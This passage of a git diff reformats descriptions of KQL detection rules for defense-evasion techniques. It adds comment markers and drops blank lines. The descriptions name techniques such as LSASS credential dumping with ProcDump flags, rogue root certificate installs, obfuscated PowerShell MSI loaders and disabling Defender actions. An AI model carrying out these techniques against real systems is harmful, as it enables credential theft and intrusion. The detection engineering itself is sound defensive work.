while potentially bypassing application whitelisting defenses. - +// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1220 // False Positives: diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql index 47eb9926..c966b8b5 100644 --- a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql +++ b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-09-18 // Level: high // Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". -This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. - +// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql index 6e7e7e76..efa434e8 100644 --- a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql +++ b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql @@ -3,7 +3,6 @@ // Date: 2019-10-26 // Level: medium // Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql index 4c4e8b12..491c2009 100644 --- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql +++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-03-05 // Level: medium // Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. -Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. - +// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1553.004 // False Positives: diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql index 3ad5cfca..35c79c9c 100644 --- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-03-05 // Level: medium // Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. -Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. - +// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1553.004 // False Positives: diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql index 2d47b001..9e11b022 100644 --- a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql +++ b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql @@ -3,11 +3,10 @@ // Date: 2025-05-27 // Level: high // Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). -The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting -malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection -by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with -hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction. - +// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting +// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection +// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with +// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001 diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql index dff6354b..25eb58fd 100644 --- a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql +++ b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql @@ -3,8 +3,7 @@ // Date: 2023-02-02 // Level: high // Description: Detects the execution of malicious OneNote documents that contain embedded scripts. -When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories. - +// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql index fa41dd99..c5ad1551 100644 --- a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql +++ b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql @@ -3,8 +3,7 @@ // Date: 2022-08-30 // Level: high // Description: Detects a network connection initiated by Cmstp.EXE -Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. - +// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.003 diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql index 4ff2d80e..641540a3 100644 --- a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql +++ b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-07-08 // Level: high // Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. -This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses. - +// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql index 92cd9f87..166c86b8 100644 --- a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql +++ b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql @@ -3,8 +3,7 @@ // Date: 2019-10-26 // Level: medium // Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. -Attackers might abuse this in order to bypass application whitelisting. - +// Attackers might abuse this in order to bypass application whitelisting. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, attack.t1027.004 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql index a4d4f029..ccc28b9a 100644 --- a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql +++ b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql @@ -3,7 +3,6 @@ // Date: 2023-12-20 // Level: high // Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1140 diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql index 9bf81b2b..c7cb25b5 100644 --- a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql +++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql @@ -3,8 +3,7 @@ // Date: 2024-09-02 // Level: high // Description: Detects potential commandline obfuscation using unicode characters. -Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. - +// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1027 diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql index 094b8395..594222d1 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql @@ -3,8 +3,7 @@ // Date: 2023-02-15 // Level: high // Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. -This is used as an obfuscation and masquerading techniques. - +// This is used as an obfuscation and masquerading techniques. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.002 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql index 96822dbf..dba28315 100644 --- a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql +++ b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql @@ -3,9 +3,8 @@ // Date: 2020-04-17 // Level: medium // Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. -HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". -Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe - +// HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". +// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036 diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql index 54ee0585..4f108098 100644 --- a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql +++ b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql @@ -3,8 +3,7 @@ // Date: 2023-11-09 // Level: medium // Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE -The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" - +// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1218 diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql index 7d0607bb..8b44ac72 100644 --- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql +++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql @@ -3,7 +3,6 @@ // Date: 2023-10-09 // Level: medium // Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe" - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1564.004 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql index 34c2ae61..0208baee 100644 --- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql +++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql @@ -3,7 +3,6 @@ // Date: 2023-10-09 // Level: medium // Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1564.004 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql index cab5b704..09b123c5 100644 --- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql +++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql @@ -3,9 +3,8 @@ // Date: 2023-05-07 // Level: medium // Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. -This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that -are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. - +// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that +// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql index da8a62c3..a0864334 100644 --- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql +++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql @@ -3,9 +3,8 @@ // Date: 2023-05-08 // Level: medium // Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. -This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that -are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. - +// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that +// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql index b393fef2..f8ad213b 100644 --- a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql +++ b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql @@ -3,10 +3,9 @@ // Date: 2018-10-30 // Level: high // Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump. -This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers. -LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory. -Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation. - +// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers. +// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory. +// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql index ae538fc8..8881b362 100644 --- a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql +++ b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql @@ -3,7 +3,6 @@ // Date: 2023-01-27 // Level: medium // Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1036.003 // False Positives: diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql index 62321492..440754e0 100644 --- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql +++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql @@ -3,8 +3,7 @@ // Date: 2021-06-09 // Level: high // Description: Detects potential persistence activity via outlook home page. -An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. - +// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.t1112 diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql index c1c59c55..bcf744d7 100644 --- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql +++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql @@ -3,8 +3,7 @@ // Date: 2021-06-10 // Level: high // Description: Detects potential persistence activity via outlook today page. -An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl". - +// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl". // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.t1112 diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql index acc10fec..596765b3 100644 --- a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql +++ b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql @@ -3,8 +3,7 @@ // Date: 2018-08-25 // Level: high // Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. -This detection assumes that PowerShell commands are passed via the CommandLine. - +// This detection assumes that PowerShell commands are passed via the CommandLine. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218.011 diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql index 95e665ee..f196d95c 100644 --- a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql +++ b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-07-12 // Level: high // Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. -The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. -Attackers abuse this utility to install malicious MOF scripts - +// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. +// Attackers abuse this utility to install malicious MOF scripts // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql index 79ad5087..04bb8eee 100644 --- a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql +++ b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql @@ -3,8 +3,7 @@ // Date: 2022-12-29 // Level: medium // Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. -Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images - +// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql index 6ce8288c..44e61799 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql @@ -3,8 +3,7 @@ // Date: 2022-07-12 // Level: medium // Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. -This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. - +// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql index b65c479e..6b6db9ad 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql @@ -3,7 +3,6 @@ // Date: 2022-02-25 // Level: high // Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059 diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql index d5dbfc34..198214a4 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql @@ -3,7 +3,6 @@ // Date: 2023-07-18 // Level: medium // Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1070.004 diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql index 362e2577..27e47681 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql @@ -3,8 +3,7 @@ // Date: 2024-08-16 // Level: medium // Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. -Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. - +// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071 // False Positives: diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql index 8151d305..e0cea487 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql @@ -3,7 +3,6 @@ // Date: 2025-02-07 // Level: medium // Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion // False Positives: diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql index 2806782f..56626ac0 100644 --- a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql +++ b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql @@ -3,8 +3,7 @@ // Date: 2020-10-12 // Level: medium // Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. -One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. - +// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql index 36da9f08..4d40e3d9 100644 --- a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql +++ b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql @@ -3,9 +3,8 @@ // Date: 2025-07-11 // Level: high // Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). -This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level. -An attacker might use this technique via the command line to bypass defenses before executing payloads. - +// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level. +// An attacker might use this technique via the command line to bypass defenses before executing payloads. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql index dc49a90c..1f195db4 100644 --- a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql +++ b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql @@ -3,8 +3,7 @@ // Date: 2024-07-23 // Level: medium // Description: Detects the use of powershell commands from headless ConHost window. -The "--headless" flag hides the windows from the user upon execution. - +// The "--headless" flag hides the windows from the user upon execution. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003 diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql index 595bfd68..dcd20223 100644 --- a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql +++ b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql @@ -3,7 +3,6 @@ // Date: 2023-03-14 // Level: medium // Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql index b67708b4..a7d5dc12 100644 --- a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql +++ b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-06-09 // Level: medium // Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql index 9ccb15f5..bc1d55df 100644 --- a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql +++ b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql @@ -3,9 +3,8 @@ // Date: 2025-05-26 // Level: medium // Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits. -VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag, -attackers can leverage this parameter to proxy the execution of malware. - +// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag, +// attackers can leverage this parameter to proxy the execution of malware. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1202 // False Positives: diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql index 875e0868..b6a46bbb 100644 --- a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql +++ b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-10-10 // Level: medium // Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). -Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. -Threat actors abused older vulnerable versions to manipulate system processes. - +// Process Hacker is a tool to 